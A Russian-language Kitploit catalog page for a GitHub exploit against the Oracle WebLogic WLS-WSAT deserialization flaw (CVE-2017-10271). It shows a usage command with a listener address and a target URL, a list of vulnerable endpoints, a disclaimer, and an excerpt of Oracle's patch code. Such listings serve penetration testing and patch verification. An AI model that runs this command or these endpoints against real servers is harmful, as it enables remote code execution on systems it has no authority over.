Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/kkirsche/cve-2017-10271
Фреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Эксплойт на Python и Metasploit для уязвимости десериализации Oracle WebLogic WLS-WSAT (CVE-2017-10271) с возможностями сканирования для обнаружения уязвимости и удалённого выполнения кода.

Репозиторий
1294223 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-10271

Скрипт обнаружения и эксплуатации уязвимости десериализации компонента Weblogic wls-wsat (CVE-2017-10271)

Использование

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

Возможности

  • Автономный скрипт на Python
    • Функция проверки, уязвим ли хост
    • Функция эксплуатации для целей под Linux
  • Модуль Metasploit
    • Функция проверки, уязвим ли хост
    • Функция эксплуатации для всех целей
  • Сканер (./scanners)
    • Проверяет, уязвимы ли хосты. Полностью автономный

Правовое уведомление

Вы несете ответственность за использование этого скрипта. Kevin Kirsche не несет никакой ответственности за любые действия, предпринятые с использованием кода, представленного здесь. Код создан для команд, желающих проверить безопасность своих серверов, а не для злонамеренного использования.

Благодарности

Огромное спасибо Luffin за создание исходного POC, на котором основан этот скрипт: https://github.com/Luffin/CVE-2017-10271

Уязвимые URL, помимо показанного:

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

Связанная уязвимость

CVE 2017-3506

Патч от Oracle

Исходный источник: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

Обновлённый источник: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
Скачать инструмент